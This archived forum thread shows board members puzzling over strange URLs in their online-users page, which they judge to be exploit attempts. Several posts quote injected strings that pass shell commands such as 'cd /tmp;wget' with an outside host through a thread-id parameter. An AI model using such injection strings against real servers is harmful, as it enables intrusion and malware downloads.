Register | Login | |||||
Main
| Memberlist
| Active users
| ACS
| Commons
| Calendar
| Online users Ranks | FAQ | Color Chart | Photo album | IRC Chat |
| |
0 user currently in Suggestions/Bug Reports. |
Acmlm's Board - I2 Archive - Suggestions/Bug Reports - something looks strange here.... | | | |
Add to favorites | "RSS" Feed | Next newer thread | Next older thread |
User | Post | ||
Sokarhacd Ball and Chain Trooper Resistance is Futile You Will Be Assimilated Hab SoSlI' Quch Level: 61 Posts: 914/1757 EXP: 1799888 For next: 76708 Since: 03-15-04 Since last post: 6 days Last activity: 4 hours |
| ||
http://img138.exs.cx/img138/9825/wtf2fr.png either that guy is stupid, or hes trying something... (edited by ? |
|||
Karadur Fire Snake Level: 48 Posts: 439/1192 EXP: 786444 For next: 37099 Since: 11-02-04 From: Chatham, Ontario, Canada Since last post: 1 day Last activity: 15 hours |
| ||
I'm vying for him being stupid. I don't know a lot about the way PHP works and such, but what kind of thread id is that? I tried typing it in, but it lead me to an error page Odd thing is, that site appeared to be just another one of the ones you get when you make a typo in a URL The fact that the title of the page is "Coming Soon!" is even more convincing. The fact that there's two instances of the word 'spy' in that URL are worrying though. |
|||
DarkSlaya POOOOOOOOOOOORN! Level: 88 Posts: 3046/4249 EXP: 6409254 For next: 241410 Since: 05-16-04 From: Montreal, Quebec, Canada Since last post: 8 hours Last activity: 5 hours |
| ||
He was probably trying to use the board as a proxy or something. | |||
Cymoro PATRICK DUFFY WILL LASER YOUR SOUL Level: 67 Posts: 1531/2216 EXP: 2549743 For next: 43129 Since: 03-15-04 From: Cymoro Gaming Since last post: 6 hours Last activity: 4 hours |
| ||
It's called a bot, my friends. It's like a Google bot, but this one seems to do odder things. | |||
Legion banning people for no reason sure is fun Level: 101 Posts: 3401/5657 EXP: 10399737 For next: 317938 Since: 03-15-04 From: The Crossroads is under attack! Since last post: 5 days Last activity: 5 days |
| ||
Did anyone even try to go to visualcoders.net? There's no such thing. (Credit goes to Kwan.) (edited by |+Legion+| on 12-25-04 10:53 PM) |
|||
HyperLamer <||bass> and this was the soloution i thought of that was guarinteed to piss off the greatest amount of people Sesshomaru Tamaranian Level: 118 Posts: 2672/8210 EXP: 18171887 For next: 211027 Since: 03-15-04 From: Canada, w00t! LOL FAD Since last post: 2 hours Last activity: 2 hours |
| ||
Confusing. Looking at the fact that he's put this in the thread ID, and that you can make out 'cmd=cd /tmp;wget www.visualcoders.net/spybot' makes it look very suspicious. But the fact that 'http://www.visualcoders.net/spy.gif' is included before it, and that he used '?&', makes it look just plain odd. http://www.visualcoders.net is just an ad page. spy.gif doesn't appear to exist (also notice 'Apache/1.3.29 Server at INSERT_SERVER_NAME' ). However if you go to 'http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp', there appears to be a brief page transition. |
|||
Xkeeper The required libraries have not been defined. Level: NAN Posts: -2893/-863 EXP: NAN For next: 0 Since: 03-15-04 Since last post: 2 hours Last activity: -753366 sec. |
| ||
Well, with me and my usual hiding in online.php thing, I fuond another: http://board.acmlm.org/thread.php?id=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/ This is getting pretty, er, lame. |
|||
Acmlm Torosu heh Level: 51 Posts: 981/1173 EXP: 981994 For next: 31944 Since: 03-15-04 From: Somewhere that isn't outside of Sherbrooke, Québec, Canada Since last post: 39 days Last activity: 3 hours |
| ||
Maybe it's an attempt to mess up the MySQL query, but it gives something like this:SELECT * FROM threads WHERE id=http://... And considering the invalid thread id (URL entered) isn't even printed anywhere on the resulting page ... |
|||
HyperLamer <||bass> and this was the soloution i thought of that was guarinteed to piss off the greatest amount of people Sesshomaru Tamaranian Level: 118 Posts: 2675/8210 EXP: 18171887 For next: 211027 Since: 03-15-04 From: Canada, w00t! LOL FAD Since last post: 2 hours Last activity: 2 hours |
| ||
It definitely looks like an exploit attempt, since shell commands are being passeed in the URL to a non-existant file. The question is which site are they trying to exploit? Hmm, speaking of online.php, I think I noticed a bug. Since it uses relative links, people using the IP address show up as being at http://board.acmlm.org/board/whatever. |
|||
Sokarhacd Ball and Chain Trooper Resistance is Futile You Will Be Assimilated Hab SoSlI' Quch Level: 61 Posts: 920/1757 EXP: 1799888 For next: 76708 Since: 03-15-04 Since last post: 6 days Last activity: 4 hours |
| ||
stupid people...they are just jealous they cant have a successful forum lol..so they have to ruin everyone elses. | |||
Smallhacker Green Birdo SMW Hacking Moderator Level: 68 Posts: 1140/2273 EXP: 2647223 For next: 81577 Since: 03-15-04 From: Söderhamn, Sweden Since last post: 10 hours Last activity: 9 hours |
| ||
Since you said that he might be trying to ruin the boards........ Hey, admins! Remember to make backups often! (edited by Smallhacker on 12-27-04 08:08 AM) |
Add to favorites | "RSS" Feed | Next newer thread | Next older thread |
Acmlm's Board - I2 Archive - Suggestions/Bug Reports - something looks strange here.... | | | |